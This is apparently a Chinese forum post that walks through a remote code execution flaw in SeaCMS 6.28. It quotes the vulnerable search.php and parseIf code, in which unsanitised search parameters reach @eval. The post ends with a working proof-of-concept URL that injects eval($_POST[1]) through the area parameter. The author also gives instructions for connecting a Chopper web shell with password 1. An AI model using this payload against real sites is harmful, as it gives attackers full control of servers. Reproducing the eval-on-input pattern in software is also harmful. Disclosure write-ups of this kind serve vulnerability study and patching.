TA的每日心情 | 难过 昨天 22:31 |
---|
签到天数: 1652 天 [LV.Master]伴坛终老
|
海洋CMS 版本 6.28 代码执行漏洞,很早之前挖的,网上已经被曝了,发出来当学习吧
漏洞文件:seacms/search.php- function echoSearchPage()
- {
- global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;
- $order = !empty($order)?$order:time;
- if(intval($searchtype)==5)
- {
- $searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/cascade.html";
- $typeStr = !empty($tid)?intval($tid).'_':'0_';
- $yearStr = !empty($year)?PinYin($year).'_':'0_';
- $letterStr = !empty($letter)?$letter.'_':'0_';
- $areaStr = !empty($area)?PinYin($area).'_':'0_';
- $orderStr = !empty($order)?$order.'_':'0_';
- $jqStr = !empty($jq)?$jq.'_':'0_';
- $cacheName="parse_cascade_".$typeStr.$yearStr.$letterStr.$areaStr.$orderStr;
- $pSize = getPageSizeOnCache($searchTemplatePath,"cascade","");
- }else
- {
- if($cfg_search_time&&$page==1) checkSearchTimes($cfg_search_time);
- $searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/search.html";
- $cacheName="parse_search_";
- $pSize = getPageSizeOnCache($searchTemplatePath,"search","");
- }
- if (empty($pSize)) $pSize=12;
- switch (intval($searchtype)) {
- case -1:
- $whereStr=" where v_recycled=0 and (v_name like '%$searchword%' or v_actor like '%$searchword%' or v_director like '%$searchword%' or v_publisharea like '%$searchword%' or v_publishyear like '%$searchword%' or v_letter='$searchword' or v_tags='$searchword' or v_nickname like '%$searchword%')";
- break;
- case 0:
- $whereStr=" where v_recycled=0 and v_name like '%$searchword%'";
- break;
- case 1:
- $whereStr=" where v_recycled=0 and v_actor like '%$searchword%'";
- break;
- case 2:
- $whereStr=" where v_recycled=0 and v_publisharea like '%$searchword%'";
- break;
- case 3:
- $whereStr=" where v_recycled=0 and v_publishyear like '%$searchword%'";
- break;
- case 4:
- $whereStr=" where v_recycled=0 and v_letter='".strtoupper($searchword)."'";
- break;
- case 5:
- $whereStr=" where v_recycled=0";
- if(!empty($tid)) $whereStr.=" and (tid in (".getTypeId($tid).") or FIND_IN_SET('".$tid."',v_extratype)<>0)";
- if($year=="more")
- {
- $publishyeartxt=sea_DATA."/admin/publishyear.txt";
- $publishyear = array();
- if(filesize($publishyeartxt)>0)
- {
- $publishyear = file($publishyeartxt);
- }
- $yearArray=$publishyear;
- $yeartxt= implode(',',$yearArray);
- $whereStr.=" and v_publishyear not in ($yeartxt)";
- }
- if(!empty($year) AND $year!="more")
- {$whereStr.=" and v_publishyear='$year'";}
- if($letter=="0-9")
- {$whereStr.=" and v_letter in ('0','1','2','3','4','5','6','7','8','9')";}
- if(!empty($letter) AND $letter!="0-9")
- {$whereStr.=" and v_letter='$letter'";}
- if(!empty($area)) $whereStr.=" and v_publisharea='$area'";
- if(!empty($yuyan)) $whereStr.=" and v_lang='$yuyan'";
- if(!empty($jq)) $whereStr.=" and v_jq like'%$jq%'";
- if($state=='l') $whereStr.=" and v_state !=0";
- if($state=='w') $whereStr.=" and v_state=0";
- if($money=='s') $whereStr.=" and v_money !=0";
- if($money=='m') $whereStr.=" and v_money=0";
- if(!empty($ver)) $whereStr.=" and v_ver='$ver'";
- break;
- }
- $sql="select count(*) as dd from sea_data ".$whereStr;
- $row = $dsql->GetOne($sql);
- if(is_array($row))
- {
- $TotalResult = $row['dd'];
- }
- else
- {
- $TotalResult = 0;
- }
- $pCount = ceil($TotalResult/$pSize);
- if($cfg_iscache){
- if(chkFileCache($cacheName)){
- $content = getFileCache($cacheName);
- }else{
- $content = parseSearchPart($searchTemplatePath);
- setFileCache($cacheName,$content);
- }
- }else{
- $content = parseSearchPart($searchTemplatePath);
- }
- $content = str_replace("{searchpage:page}",$page,$content);
- $content = str_replace("{seacms:searchword}",$searchword,$content);
- $content = str_replace("{seacms:searchnum}",$TotalResult,$content);
- $content = str_replace("{searchpage:ordername}",$order,$content);
-
- $content = str_replace("{searchpage:order-hit-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hit&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
- $content = str_replace("{searchpage:order-hitasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hitasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
-
- $content = str_replace("{searchpage:order-id-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=id&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
- $content = str_replace("{searchpage:order-idasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=idasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
-
- $content = str_replace("{searchpage:order-time-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=time&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
- $content = str_replace("{searchpage:order-timeasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=timeasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
-
- $content = str_replace("{searchpage:order-commend-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=commend&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
- $content = str_replace("{searchpage:order-commendasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=commendasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
-
- $content = str_replace("{searchpage:order-score-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=score&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
- $content = str_replace("{searchpage:order-scoreasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=scoreasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
- if(intval($searchtype)==5)
- {
- $tname = !empty($tid)?getTypeNameOnCache($tid):'全部';
- $jq = !empty($jq)?$jq:'全部';
- $area = !empty($area)?$area:'全部';
- $year = !empty($year)?$year:'全部';
- $yuyan = !empty($yuyan)?$yuyan:'全部';
- $letter = !empty($letter)?$letter:'全部';
- $state = !empty($state)?$state:'全部';
- $ver = !empty($ver)?$ver:'全部';
- $money = !empty($money)?$money:'全部';
- $content = str_replace("{searchpage:type}",$tid,$content);
- $content = str_replace("{searchpage:typename}",$tname ,$content);
- $content = str_replace("{searchpage:year}",$year,$content);
- $content = str_replace("{searchpage:area}",$area,$content);
- $content = str_replace("{searchpage:letter}",$letter,$content);
- $content = str_replace("{searchpage:lang}",$yuyan,$content);
- $content = str_replace("{searchpage:jq}",$jq,$content);
- if($state=='w'){$state2="完结";}elseif($state=='l'){$state2="连载中";}else{$state2="全部";}
- if($money=='m'){$money2="免费";}elseif($money=='s'){$money2="收费";}else{$money2="全部";}
- $content = str_replace("{searchpage:state}",$state2,$content);
- $content = str_replace("{searchpage:money}",$money2,$content);
- $content = str_replace("{searchpage:ver}",$ver,$content);
- $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"cascade");
- $content=$mainClassObj->parseSearchItemList($content,"type");
- $content=$mainClassObj->parseSearchItemList($content,"year");
- $content=$mainClassObj->parseSearchItemList($content,"area");
- $content=$mainClassObj->parseSearchItemList($content,"letter");
- $content=$mainClassObj->parseSearchItemList($content,"lang");
- $content=$mainClassObj->parseSearchItemList($content,"jq");
- $content=$mainClassObj->parseSearchItemList($content,"state");
- $content=$mainClassObj->parseSearchItemList($content,"ver");
- $content=$mainClassObj->parseSearchItemList($content,"money");
- }else
- {
- $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"search");
- }
- $content=replaceCurrentTypeId($content,-444);
- $content=$mainClassObj->parseIf($content); //这个函数引起的,我们来跟踪下这个函数
- $content=str_replace("{seacms:member}",front_member(),$content);
- $searchPageStr = $content;
- echo str_replace("{seacms:runinfo}",getRunTime($t1),$searchPageStr) ;
- }
复制代码 parseif函数路径:/include/main.class.php- function parseIf($content){
- if (strpos($content,'{if:')=== false){
- return $content;
- }else{
- $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");
- $labelRule2="{elseif";
- $labelRule3="{else}";
- preg_match_all($labelRule,$content,$iar);
- $arlen=count($iar[0]);
- $elseIfFlag=false;
- for($m=0;$m<$arlen;$m++){
- $strIf=$iar[1][$m];
- $strIf=$this->parseStrIf($strIf);
- $strThen=$iar[2][$m];
- $strThen=$this->parseSubIf($strThen);
- if (strpos($strThen,$labelRule2)===false){
- if (strpos($strThen,$labelRule3)>=0){
- $elsearray=explode($labelRule3,$strThen);
- $strThen1=$elsearray[0];
- $strElse1=$elsearray[1];
- @eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");
- if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}
- }else{
- @eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");//就是这里了,@eval
- if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}
- }else{
- $elseIfArray=explode($labelRule2,$strThen);
- $elseIfArrayLen=count($elseIfArray);
- $elseIfSubArray=explode($labelRule3,$elseIfArray[$elseIfArrayLen-1]);
- $resultStr=$elseIfSubArray[1];
- $elseIfArraystr0=addslashes($elseIfArray[0]);
- @eval("if($strIf){\$resultStr=\"$elseIfArraystr0\";}");
- for($elseIfLen=1;$elseIfLen<$elseIfArrayLen;$elseIfLen++){
- $strElseIf=getSubStrByFromAndEnd($elseIfArray[$elseIfLen],":","}","");
- $strElseIf=$this->parseStrIf($strElseIf);
- $strElseIfThen=addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen],"}","","start"));
- @eval("if(".$strElseIf."){\$resultStr=\"$strElseIfThen\";}");
- @eval("if(".$strElseIf."){\$elseIfFlag=true;}else{\$elseIfFlag=false;}");
- if ($elseIfFlag) {break;}
- }
- $strElseIf0=getSubStrByFromAndEnd($elseIfSubArray[0],":","}","");
- $strElseIfThen0=addslashes(getSubStrByFromAndEnd($elseIfSubArray[0],"}","","start"));
- if(strpos($strElseIf0,'==')===false&&strpos($strElseIf0,'=')>0)$strElseIf0=str_replace('=', '==', $strElseIf0);
- @eval("if(".$strElseIf0."){\$resultStr=\"$strElseIfThen0\";\$elseIfFlag=true;}");
- $content=str_replace($iar[0][$m],$resultStr,$content);
- }
- }
- return $content;
- }
复制代码 POC:/search.php?searchtype=5&tid=&area=eval($_POST[1]) 菜刀链接,密码为1
|
|